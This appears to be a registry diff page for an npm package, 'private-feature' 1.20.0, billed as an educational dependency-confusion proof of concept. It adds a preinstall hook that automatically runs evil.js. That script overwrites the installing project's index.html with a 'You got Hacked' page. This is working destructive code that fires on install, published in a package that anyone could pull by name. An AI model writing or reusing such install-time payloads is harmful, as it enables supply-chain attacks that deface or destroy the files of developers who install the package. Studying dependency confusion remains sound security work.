private-feature 1.20.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/evil.js +21 -0
  2. package/package.json +10 -0
  3. package/template.html +10 -0
package/evil.js ADDED
@@ -0,0 +1,21 @@
1
+ const fs = require('fs');
2
+ const path = require('path');
3
+
4
+ // Path to template in node_modules
5
+ const templatePath = path.join(__dirname, 'template.html');
6
+
7
+ // Path to the project
8
+ const destinationPath = path.join(__dirname, '..', '..', 'index.html');
9
+
10
+ // Read the template file
11
+ fs.readFile(templatePath, 'utf8', function(err, data) {
12
+ if (err) {
13
+ return console.error(err);
14
+ }
15
+ // Erase index.html
16
+ fs.writeFile(destinationPath, data, 'utf8', function(err) {
17
+ if (err) {
18
+ return console.error(err);
19
+ }
20
+ });
21
+ });
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "name": "private-feature",
3
+ "version": "1.20.0",
4
+ "description": "A POC for Dependency Confusion for educational purpose, DO NOT DONWLOAD.",
5
+ "main": "feature.js",
6
+ "scripts": {
7
+ "preinstall": "node evil.js"
8
+ }
9
+ }
10
+
package/template.html ADDED
@@ -0,0 +1,10 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <title>Evil script</title>
6
+ </head>
7
+ <body>
8
+ <h1>You got Hacked</h1>
9
+ </body>
10
+ </html>